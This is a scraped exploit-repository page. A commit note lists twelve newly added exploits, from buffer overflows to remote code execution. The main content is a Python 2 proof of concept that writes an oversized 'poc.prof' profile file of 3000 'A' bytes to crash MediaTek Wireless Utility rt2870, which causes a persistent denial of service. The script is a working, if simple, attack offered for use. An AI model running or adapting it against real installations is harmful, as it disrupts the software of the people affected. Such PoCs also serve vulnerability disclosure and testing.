2785d40187
12 changes to exploits/shellcodes Clone2Go Video to iPod Converter 2.5.0 - Denial of Service (PoC) MediaTek Wirless Utility rt2870 - Denial of Service (PoC) TeamViewer App 13.0.100.0 - Denial of Service (PoC) Linux 4.18 - Arbitrary Kernel Read into dmesg via Missing Address Check in segfault Handler InduSoft Web Studio 8.1 SP1 - 'Tag Name' Buffer Overflow (SEH) STOPzilla AntiMalware 6.5.2.59 - Privilege Escalation Faleemi Desktop Software 1.8.2 - 'SavePath for ScreenShots' Buffer Overflow (SEH) Free MP3 CD Ripper 2.6 - '.mp3' Buffer Overflow (SEH) Socusoft Photo to Video Converter 8.07 - 'Registration Name' Buffer Overflow Chrome OS 10820.0.0 dev-channel - app->VM via garcon TCP Command Socket MyBB 1.8.17 - Cross-Site Scripting Apache Portals Pluto 3.0.0 - Remote Code Execution Apache Syncope 2.0.7 - Remote Code Execution
24 lines
No EOL
840 B
Python
Executable file
24 lines
No EOL
840 B
Python
Executable file
# Exploit Title: MediaTek Wirless Utility rt2870 - Denial of Service (PoC)
|
|
# Autor: Lawrence Amer
|
|
# Date: 2018-09-13
|
|
# Vendor: MediaTek
|
|
# Software url: https://click.pstmrk.it/2ts/d86o2zu8ugzlg.cloudfront.net%2Fmediatek-craft%2Fdrivers%2FRT2770_2870_RT307x.zip/K94pHAI/oTs1/oC6CdN114w
|
|
# Tested on OS: Windows 7 64-bit , 32-bit
|
|
|
|
# Description: launch program then click on Add profile setting dialog choose our generate prof file ,
|
|
# succesfully reproduce persistent Denial of service every time launch the program again .
|
|
|
|
#!/usr/bin/python
|
|
|
|
buffer ="\x41"*3000
|
|
start = "["
|
|
end = "]"
|
|
payload = start+buffer+end
|
|
try:
|
|
f=open("poc.prof","w")
|
|
print "[+] Creating %s Byet evil payload.." %len(payload)
|
|
f.write(payload)
|
|
f.close()
|
|
print "[+] file created !"
|
|
except:
|
|
print "File cannot be created !" |